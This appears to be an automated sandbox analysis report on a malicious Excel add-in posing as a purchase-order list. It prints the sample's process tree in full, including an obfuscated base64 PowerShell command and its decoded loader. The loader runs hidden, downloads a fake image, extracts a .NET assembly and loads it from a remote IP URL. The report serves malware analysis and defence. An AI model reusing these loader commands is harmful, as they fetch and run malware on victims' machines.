Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2023, 18:01

General

  • Target

    NEW PO LIST 02009 GREEN VALLEY.xlam

  • Size

    672KB

  • MD5

    33e8fb7aa9f005ccb2e9fb681f087366

  • SHA1

    b45c204899eb12874dca86cc7b4e12af7dbe5dba

  • SHA256

    d300bd3ed7461b1c05c983a03ab34d07e23f8233bebab33c52631303de624c1a

  • SHA512

    18750e93e945e3f850d314ab5c3f6eebeccf3c552b6da0fb5b195f17e6cdef96521535475c8a912ab8da570fc78228b7601dbe99ff4cff9853bb2f51a03e9d1e

  • SSDEEP

    12288:d0dNkjFUgZAurY/a93VUmy8GQxMi4T+0J852WWqoq7lHoyPm3MywDcTYIj1CsB:2Eb0mycMiY+yI2WWylHo0mhYW19B

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129

exe.dropper

https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\NEW PO LIST 02009 GREEN VALLEY.xlam"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1036
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\filecast.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵N⁂⇵⁂⇵0⁂⇵DQ⁂⇵N⁂⇵⁂⇵0⁂⇵DQ⁂⇵N⁂⇵⁂⇵0⁂⇵DQ⁂⇵N⁂⇵⁂⇵0⁂⇵DY⁂⇵ZQBz⁂⇵GE⁂⇵YgBy⁂⇵HQ⁂⇵cwBh⁂⇵GM⁂⇵Lw⁂⇵0⁂⇵DI⁂⇵Lg⁂⇵w⁂⇵DI⁂⇵MQ⁂⇵u⁂⇵Dg⁂⇵Nw⁂⇵x⁂⇵C4⁂⇵NQ⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.444444444446esabrtsac/42.021.871.591//:ptth');$method.Invoke($null, $arguments)"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2384

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    30deca3ec25084244d3badb49383a093

    SHA1

    c90ce7f6c23911fc2b4a9ea060c30d500e6d2d52

    SHA256

    9c38ddad9e7031bf2a616617c3129473db0d6ee30c99d96891aa1f9fed335c30

    SHA512

    f0b9d9694c5d58fda849e654c0543fb4f363a6dd16ebeca11c6018c5aadd2a10d80e35ca34a501ff303b1047681a9b13cc2cdc07b82d1731f960ab980327274d

  • C:\Users\Admin\AppData\Local\Temp\CabA2B7.tmp

    Filesize

    62KB

    MD5

    3ac860860707baaf32469fa7cc7c0192

    SHA1

    c33c2acdaba0e6fa41fd2f00f186804722477639

    SHA256

    d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

    SHA512

    d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

  • C:\Users\Admin\AppData\Local\Temp\TarA492.tmp

    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EDM3OREPGD4LKXL23BV2.temp

    Filesize

    7KB

    MD5

    525c4a5bad82309e5e04de6618894e38

    SHA1

    b416eb40805a25d18d8f21f4f95e7b88fde845f7

    SHA256

    6a0ecad093da6918d115f125d2e9b33d1e762d5c6160e789fad2b4e4b3bc4b22

    SHA512

    b536bf7ad94766d825376491abafe635adc6f1cbc6ea049309db65f01e2f11b0deb177720e0ae91b72b39a8ea3d549050beb620617be588a3ba2b6ca3429bf9b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    525c4a5bad82309e5e04de6618894e38

    SHA1

    b416eb40805a25d18d8f21f4f95e7b88fde845f7

    SHA256

    6a0ecad093da6918d115f125d2e9b33d1e762d5c6160e789fad2b4e4b3bc4b22

    SHA512

    b536bf7ad94766d825376491abafe635adc6f1cbc6ea049309db65f01e2f11b0deb177720e0ae91b72b39a8ea3d549050beb620617be588a3ba2b6ca3429bf9b

  • C:\Users\Admin\AppData\Roaming\filecast.vbs

    Filesize

    319KB

    MD5

    45775df4b3fe3a8b5b3db3df4de8fe57

    SHA1

    f2afc2f94edd55c64c6a4e9d68c9736daa0df9bf

    SHA256

    27aba9d5c5fe35e412572712cf1bd6302dbeb37077163cfc6a7c692990c2ee5a

    SHA512

    e5719ffbe6ac30a30a8ea34d01010ca2050b600f26370a18a1ef1bfd0bee0b2a65d6bd446d5473e425671a82f1a9f1291c9ad013ce518e9b06b45926133f3d49

  • C:\Users\Admin\AppData\Roaming\filecast.vbs

    Filesize

    319KB

    MD5

    45775df4b3fe3a8b5b3db3df4de8fe57

    SHA1

    f2afc2f94edd55c64c6a4e9d68c9736daa0df9bf

    SHA256

    27aba9d5c5fe35e412572712cf1bd6302dbeb37077163cfc6a7c692990c2ee5a

    SHA512

    e5719ffbe6ac30a30a8ea34d01010ca2050b600f26370a18a1ef1bfd0bee0b2a65d6bd446d5473e425671a82f1a9f1291c9ad013ce518e9b06b45926133f3d49

  • memory/1036-97-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1036-98-0x0000000073EAD000-0x0000000073EB8000-memory.dmp

    Filesize

    44KB

  • memory/1036-24-0x0000000073EAD000-0x0000000073EB8000-memory.dmp

    Filesize

    44KB

  • memory/1036-1-0x0000000073EAD000-0x0000000073EB8000-memory.dmp

    Filesize

    44KB

  • memory/1036-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2384-23-0x00000000025F0000-0x0000000002630000-memory.dmp

    Filesize

    256KB

  • memory/2384-22-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2384-21-0x00000000025F0000-0x0000000002630000-memory.dmp

    Filesize

    256KB

  • memory/2384-20-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2384-94-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2952-25-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2952-63-0x0000000002700000-0x0000000002740000-memory.dmp

    Filesize

    256KB

  • memory/2952-13-0x0000000002700000-0x0000000002740000-memory.dmp

    Filesize

    256KB

  • memory/2952-14-0x0000000002700000-0x0000000002740000-memory.dmp

    Filesize

    256KB

  • memory/2952-93-0x0000000002700000-0x0000000002740000-memory.dmp

    Filesize

    256KB

  • memory/2952-95-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2952-12-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2952-11-0x000000006C970000-0x000000006CF1B000-memory.dmp

    Filesize

    5.7MB